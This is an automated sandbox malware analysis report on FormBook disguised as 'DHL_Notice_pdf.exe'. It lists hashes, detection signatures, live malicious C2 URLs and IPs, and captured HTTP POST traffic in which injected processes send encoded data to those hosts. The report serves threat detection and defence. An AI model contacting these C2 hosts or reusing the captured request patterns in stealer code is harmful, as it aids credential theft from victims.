Windows Analysis Report
DHL_Notice_pdf.exe

Overview

General Information

Sample Name: DHL_Notice_pdf.exe
Analysis ID: 831175
MD5: 771508cf2751f6dabe05758e4fa25fdf
SHA1: f6d7d33b6a340d2c370ca31a6f9677a2e5306486
SHA256: 652948efee89fdc5c6d3dc7f65a16aafabd0d224c9fcd55e5f86573f1b2c4aa1
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc.)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

AV Detection

Source: DHL_Notice_pdf.exe ReversingLabs: Detection: 46%
Source: DHL_Notice_pdf.exe Virustotal: Detection: 42%
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== Avira URL Cloud: Label: malware
Source: http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.amirah.cfd/hpb7/ Avira URL Cloud: Label: phishing
Source: http://www.amirah.cfd Avira URL Cloud: Label: phishing
Source: http://www.0dhy.xyz/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.traindic.top/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.traindic.top/hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X Avira URL Cloud: Label: malware
Source: http://www.admet01.club Avira URL Cloud: Label: malware
Source: http://www.adoptiveimmunotech.com/hpb7/j Avira URL Cloud: Label: malware
Source: http://www.traindic.top Avira URL Cloud: Label: malware
Source: http://www.yongleproducts.com/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.admet01.club/hpb7/ Avira URL Cloud: Label: malware
Source: http://www.mindsetlighting.xyz Avira URL Cloud: Label: malware
Source: bohndigitaltech.com Virustotal: Detection: 5%
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe ReversingLabs: Detection: 27%
Source: DHL_Notice_pdf.exe Joe Sandbox ML: detected
Source: 1.2.zkvixbqxp.exe.9f0000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.zkvixbqxp.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: DHL_Notice_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: DHL_Notice_pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: cmmon32.pdb source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: zkvixbqxp.exe, 00000003.00000002.274188632.0000000000920000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: zkvixbqxp.exe, 00000001.00000003.241452408.0000000019FF0000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000001.00000003.241643888.000000001A180000.00000004.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: zkvixbqxp.exe, zkvixbqxp.exe, 00000003.00000002.274212822.0000000000AEF000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000002.274212822.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, zkvixbqxp.exe, 00000003.00000003.245869729.0000000000838000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000005.00000002.505725173.00000000045DF000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.505725173.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.273703792.0000000004189000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.275305652.000000000432B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405D74
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040699E FindFirstFileW,FindClose, 0_2_0040699E
Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_0040290B FindFirstFileW, 0_2_0040290B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_027D31A0 FindFirstFileW,FindNextFileW,FindClose, 5_2_027D31A0
Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 4x nop then xor ebx, ebx 3_2_0040DCB4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then pop edi 5_2_027C8D70
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 4x nop then xor ebx, ebx 5_2_027CBEC1

Networking

Source: C:\Windows\explorer.exe Network Connect: 198.46.160.97 80
Source: C:\Windows\explorer.exe Domain query: www.denko-kosan.com
Source: C:\Windows\explorer.exe Domain query: www.traindic.top
Source: C:\Windows\explorer.exe Network Connect: 1.13.186.125 80
Source: C:\Windows\explorer.exe Network Connect: 219.94.129.181 80
Source: C:\Windows\explorer.exe Network Connect: 162.0.231.77 80
Source: C:\Windows\explorer.exe Network Connect: 67.222.24.48 80
Source: C:\Windows\explorer.exe Network Connect: 49.212.180.95 80
Source: C:\Windows\explorer.exe Domain query: www.bohndigitaltech.com
Source: C:\Windows\explorer.exe Domain query: www.0dhy.xyz
Source: C:\Windows\explorer.exe Domain query: www.yongleproducts.com
Source: C:\Windows\explorer.exe Network Connect: 162.241.24.110 80
Source: C:\Windows\explorer.exe Domain query: www.rifleroofers.com
Source: C:\Windows\explorer.exe Domain query: www.kunimi.org
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.bisarropainting.com
Source: Traffic Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:51139 -> 8.8.8.8:53
Source: C:\Windows\explorer.exe DNS query: www.0dhy.xyz
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: PRIVATESYSTEMSUS
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1 Host: www.yongleproducts.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1 Host: www.0dhy.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1 Host: www.kunimi.org Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1 Host: www.traindic.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1 Host: www.bohndigitaltech.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1 Host: www.rifleroofers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1 Host: www.denko-kosan.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View IP Address: 198.46.160.97
Source: Joe Sandbox View IP Address: 67.222.24.48
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 4d 70 4e 34 42 63 49 58 75 59 58 5a 77 34 31 77 37 77 71 4f 75 56 79 4f 63 53 76 5a 30 49 66 59 78 2d 70 50 78 5a 68 48 62 47 61 6f 7e 51 42 63 44 6c 76 79 4b 51 63 49 78 50 6f 46 46 30 39 36 71 5a 47 53 77 6f 59 68 37 39 51 63 61 42 76 41 61 53 75 78 5a 6f 4d 4e 65 53 4b 5a 68 6f 6f 34 35 59 5a 43 4a 39 28 54 6b 54 4c 35 36 74 50 34 7a 43 37 56 71 6b 56 4b 6b 65 67 46 30 53 75 6e 62 71 4f 49 75 5f 46 45 4d 6f 6c 6f 51 57 47 74 4d 36 4f 37 78 36 32 50 53 4a 54 78 37 45 7a 6b 54 31 72 78 72 36 63 72 6e 73 31 52 5a 30 76 59 61 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1 Host: www.0dhy.xyz Connection: close Content-Length: 5336 Cache-Control: no-cache Origin: http://www.0dhy.xyz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.0dhy.xyz/hpb7/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.kunimi.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.kunimi.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.kunimi.org/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 47 75 61 75 64 39 45 4f 77 48 76 76 68 62 77 68 55 70 32 5f 62 59 48 39 4f 65 73 6d 4f 5a 6c 61 76 33 55 61 6d 59 76 44 30 34 4c 4d 49 46 6d 4b 37 6a 61 33 72 71 57 59 66 61 6f 53 34 41 7a 58 48 5a 6c 72 54 63 71 45 75 65 68 32 70 50 69 6a 67 35 4e 71 62 74 42 72 79 38 78 4a 38 52 71 56 4a 7a 7a 39 58 33 43 2d 69 69 33 4f 56 4f 4d 48 6a 67 4d 72 61 51 59 64 79 70 39 4d 28 43 33 37 52 2d 42 49 50 47 33 5a 4d 5a 73 6b 6f 73 6b 4f 5a 63 71 39 38 58 43 52 6c 6d 31 4f 38 4f 4a 49 76 6a 43 6f 30 4e 37 50 7a 5a 31 49 39 6a 4f 44 63 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=Guaud9EOwHvvhbwhUp2_bYH9OesmOZlav3UamYvD04LMIFmK7ja3rqWYfaoS4AzXHZlrTcqEueh2pPijg5NqbtBry8xJ8RqVJzz9X3C-ii3OVOMHjgMraQYdyp9M(C37R-BIPG3ZMZskoskOZcq98XCRlm1O8OJIvjCo0N7PzZ1I9jODcQ).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1 Host: www.kunimi.org Connection: close Content-Length: 5336 Cache-Control: no-cache Origin: http://www.kunimi.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.kunimi.org/hpb7/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.traindic.topConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.traindic.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.traindic.top/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 57 52 46 6c 68 77 33 4b 41 67 62 35 79 6f 39 32 4c 58 32 55 49 66 4d 47 50 4f 4b 31 66 4a 62 56 28 69 74 4d 28 38 56 68 59 34 6e 36 6c 32 30 54 41 4c 44 50 71 72 56 5f 71 4c 69 59 79 4d 34 70 4c 50 77 6a 68 58 6d 62 4a 54 5a 6e 30 33 33 53 7e 68 48 53 44 75 71 73 4b 48 77 41 51 79 6d 33 68 44 59 6b 5a 63 77 6b 61 61 6c 4e 73 61 66 51 51 66 4e 36 46 73 6c 68 46 6e 76 78 36 30 6d 5f 53 66 75 2d 77 43 4d 67 56 46 66 75 61 59 72 78 64 6b 71 55 38 67 56 70 78 6f 75 4d 30 38 6f 4e 77 67 72 74 72 5f 31 49 32 4b 57 35 47 72 6d 6e 47 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=WRFlhw3KAgb5yo92LX2UIfMGPOK1fJbV(itM(8VhY4n6l20TALDPqrV_qLiYyM4pLPwjhXmbJTZn033S~hHSDuqsKHwAQym3hDYkZcwkaalNsafQQfN6FslhFnvx60m_Sfu-wCMgVFfuaYrxdkqU8gVpxouM08oNwgrtr_1I2KW5GrmnGg).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1 Host: www.traindic.top Connection: close Content-Length: 5336 Cache-Control: no-cache Origin: http://www.traindic.top User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.traindic.top/hpb7/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.bohndigitaltech.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bohndigitaltech.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bohndigitaltech.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 7a 53 73 47 64 67 61 39 61 6c 39 6c 52 4d 7e 6c 75 5a 74 42 55 30 74 5a 45 4d 79 6d 4b 4f 30 68 77 51 53 57 31 66 6e 63 56 41 72 65 61 2d 32 78 6e 39 28 66 37 4e 59 68 6e 47 37 45 4c 4a 6a 42 65 53 72 39 41 33 6a 4d 51 54 7a 53 5a 59 4b 4b 6f 56 73 69 32 79 57 54 4c 45 59 72 66 67 64 70 62 63 48 50 79 44 72 4c 61 43 73 30 64 6b 28 51 4a 6c 47 55 28 34 49 64 5a 37 67 30 76 66 6e 76 67 59 5a 44 33 39 51 35 43 46 6b 50 44 79 31 6f 50 57 39 37 4d 5f 38 73 34 4c 33 37 4c 53 50 43 62 67 59 38 55 71 66 5a 46 33 5a 32 67 56 30 71 61 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=zSsGdga9al9lRM~luZtBU0tZEMymKO0hwQSW1fncVArea-2xn9(f7NYhnG7ELJjBeSr9A3jMQTzSZYKKoVsi2yWTLEYrfgdpbcHPyDrLaCs0dk(QJlGU(4IdZ7g0vfnvgYZD39Q5CFkPDy1oPW97M_8s4L37LSPCbgY8UqfZF3Z2gV0qaA).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1 Host: www.bohndigitaltech.com Connection: close Content-Length: 5336 Cache-Control: no-cache Origin: http://www.bohndigitaltech.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.bohndigitaltech.com/hpb7/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 69 76 6b 49 41 2d 33 38 77 78 69 30 63 45 6e 79 76 46 52 4e 34 4c 4e 78 4e 31 70 6c 34 48 4c 5a 62 32 6f 33 73 6f 4f 43 4b 62 66 65 4b 59 38 35 68 6a 4f 70 5a 47 45 5a 66 4a 49 58 44 34 36 44 34 4f 47 59 4f 54 7e 52 72 45 31 6e 73 53 68 48 38 32 75 42 72 6d 58 4c 34 64 48 49 30 42 39 56 61 64 72 77 4f 54 6c 57 52 46 62 65 79 34 63 64 61 69 30 6b 54 4b 6c 44 63 54 4f 6f 42 5f 66 4b 44 67 6c 45 28 38 6f 65 37 4b 64 52 7e 73 79 71 42 78 52 65 72 47 6d 62 63 64 70 36 66 71 62 58 39 54 49 4c 75 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=fpdggjRt1rKnivkIA-38wxi0cEnyvFRN4LNxN1pl4HLZb2o3soOCKbfeKY85hjOpZGEZfJIXD46D4OGYOT~RrE1nsShH82uBrmXL4dHI0B9VadrwOTlWRFbey4cdai0kTKlDcTOoB_fKDglE(8oe7KdR~syqBxRerGmbcdp6fqbX9TILuA).
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.rifleroofers.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.rifleroofers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.rifleroofers.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 66 70 64 67 67 6a 52 74 31 72 4b 6e 77 66 55 49 54 4a 72 38 6e 42 69 33 43 30 6e 79 34 56 51 4b 34 4c 42 78 4e 30 64 31 37 31 6e 5a 62 68 73 33 6f 37 6d 43 49 62 66 65 4d 59 39 2d 75 44 4f 5f 5a 47 52 6f 66 4d 30 48 44 2d 4b 44 7e 63 7e 59 4b 7a 7e 57 33 55 31 6d 67 79 68 45 7a 57 75 42 72 6d 4b 6f 34 63 47 5f 30 46 78 56 61 6f 28 77 4f 52 4e 56 51 56 62 66 74 6f 63 64 61 69 34 68 54 4b 6c 54 63 54 47 34 42 37 54 4b 43 79 52 45 73 4a 55 64 72 71 64 53 7a 4d 7a 44 4e 43 38 58 68 33 75 6a 62 50 35 42 64 75 36 36 30 33 42 67 34 6a 28 41 6f 64 58 78 44 49 5a 6e 47 62 6d 4c 6b 37 32 44 7a 49 49 6d 4d 36 41 65 74 70 6e 75 79 4c 54 79 46 50 73 39 63 36 4f 47 4c 56 34 61 31 39 43 31 5a 43 72 69 6e 31 78 61 62 42 67 6a 79 45 79 47 75 44 74 75 4f 53 36 66 4e 47 51 39 65 76 4d 49 49 49 35 67 64 54 61 43 38 62 35 31 70 77 67 2d 4d 74 48 71 62 62 6b 36 6c 6c 75 63 31 32 4f 4d 34 49 31 4b 76 48 57 2d 77 4c 63 31 57 57 38 46 78 38 6e 54 51 31 68 6e 28 46 47 41 39 67 79 45 46 69 67 4e 42 5f 39 31 62 62 35 47 64 7a 66 36 70 42 46 68 59 37 6c 50 6d 33 61 64 54 50 48 69 31 64 6a 33 57 6e 48 71 36 44 76 68 66 30 58 34 76 57 64 30 76 6a 30 71 69 44 73 51 54 37 62 2d 6a 57 34 5a 7e 45 43 2d 30 56 73 45 55 6c 36 43 4a 6e 33 6c 68 70 54 6f 78 59 4b 6d 55 52 39 45 58 4e 34 4f 63 51 51 56 7a 55 7e 41 61 66 43 57 4d 68 66 62 7a 4c 6c 7a 32 47 51 43 6b 63 4f 34 4e 77 5a 42 4e 52 31 5f 75 45 4a 35 79 62 36 56 41 39 47 57 4a 54 52 4a 73 59 61 38 74 36 37 35 67 51 45 61 79 59 69 35 73 6b 31 79 5a 41 31 7a 67 54 74 71 58 74 6c 68 59 53 79 7a 57 54 
36 76 53 47 64 46 56 4d 66 4b 55 4d 6a 47 65 75 47 44 6a 76 6f 37 54 35 78 6a 57 6b 62 59 44 75 52 75 50 31 39 43 67 62 4c 48 45 52 31 44 75 69 28 7a 28 44 48 6f 77 4b 6e 35 28 46 30 59 64 6b 34 56 31 68 5a 52 6b 69 56 52 4b 45 4b 30 49 75 71 5a 48 53 62 68 4e 38 4b 41 45 59 6e 55 62 44 6a 41 4f 38 4d 67 32 58 5a 35 6a 77 61 57 52 38 4f 64 58 65 57 4e 48 55 36 71 7e 4f 76 6c 50 55 51 42 43 77 78 34 4c 4a 6a 4c 4b 31 48 43 6f 35 42 52 42 78 76 77 50 47 77 70 4a 65 43 49 71 45 33 74 71 4a 4b 62 44 44 43 6e 57 49 66 45 42 38 58 35 48 70 65 63 67 72 4c 75 4c 30 54 4f 37 4a 44 43 32 6d 31 69 51 4d 6a 7a 4a 73 45 77 71 4c 46 70 68 74 5a 41 59 2d 53 6d 52 2d 7a 54 58 32 6c 70 45 5a 68 58 45 43 69 4a 4b 45 44 57 62 4d 5a 33 41 50 4c 41 7e 61 33 74 37 70 5a 44 6e 69 51 4a 66 46 57 33 6a 57 59 33 45 77 31 34 75 70 45 51 66 32 4d 5a 71 71 73 2d 47 36 57 43 6e 32 65 6a 36 37 37 2d 55 70 50 63 49 74 63 79 62 32 38 47 5a 63 70 44 4d 6b 69 35 56 53 36 34 70 5f 32 47 44 69 4a 39 79 66 70 74 63 6c 7e 6e 7a 44 55 6a 73 6b 44 4
Source: global traffic HTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.denko-kosan.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.denko-kosan.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.denko-kosan.com/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 62 63 58 33 55 76 3d 41 73 76 67 65 4c 44 66 70 64 4b 5a 28 6d 4b 38 51 6b 52 4c 77 5f 6d 75 78 44 30 48 70 49 69 73 48 30 72 70 72 66 41 54 6b 6d 6c 6e 42 4b 68 67 79 37 65 6e 75 78 58 59 79 35 45 30 45 70 7e 58 51 6d 72 72 5a 4d 55 6e 75 76 37 33 51 69 6b 57 37 36 4c 46 59 74 71 34 32 6e 59 43 63 70 69 6c 54 39 6d 62 4e 32 54 39 4e 65 66 32 7a 68 6d 72 36 7a 4d 33 68 53 34 62 58 4c 76 6b 71 39 6d 6a 6a 67 54 33 70 45 47 69 44 34 6b 2d 51 2d 53 77 76 78 73 78 28 71 63 36 6d 42 42 61 36 51 6a 46 62 4d 68 54 47 69 4b 4e 51 5a 47 2d 5a 50 31 53 39 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: bcX3Uv=AsvgeLDfpdKZ(mK8QkRLw_muxD0HpIisH0rprfATkmlnBKhgy7enuxXYy5E0Ep~XQmrrZMUnuv73QikW76LFYtq42nYCcpilT9mbN2T9Nef2zhmr6zM3hS4bXLvkq9mjjgT3pEGiD4k-Q-Swvxsx(qc6mBBa6QjFbMhTGiKNQZG-ZP1S9g).
